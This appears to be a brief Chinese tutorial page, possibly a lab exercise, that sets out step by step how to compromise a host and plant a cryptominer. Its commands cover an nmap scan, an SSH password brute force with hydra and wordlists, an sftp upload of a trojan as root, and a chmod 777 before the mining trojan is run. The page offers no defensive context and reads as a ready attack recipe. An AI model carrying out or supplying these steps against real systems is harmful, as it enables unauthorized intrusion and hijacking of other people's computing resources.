企业🤖AI智能体构建引擎,智能编排和调试,一键部署,支持知识库和私有化部署方案 广告
[TOC] ## 攻击步骤 ### 1、信息收集 * 使用nmap命令对目标主机进行扫描。 ``` nmap -T4 -sT 目标IP地址 ``` ### 2、爆破SSH ``` hydra -L 用户字典 -P 密码字典 ssh://目标IP ``` ### 3、sftp连接目标 * 由于SSH和sftp通用一个端口 ``` sftp root@目标IP ``` ### 4、上传木马 ``` put 本机木马文件 目标目录 ``` ### 5、执行挖矿木马 * 登录 ``` ssh root@靶机ip ``` * 赋予权限 ``` chmod 777 挖矿木马文件 ``` * 执行木马文件 ``` ./木马文件 ```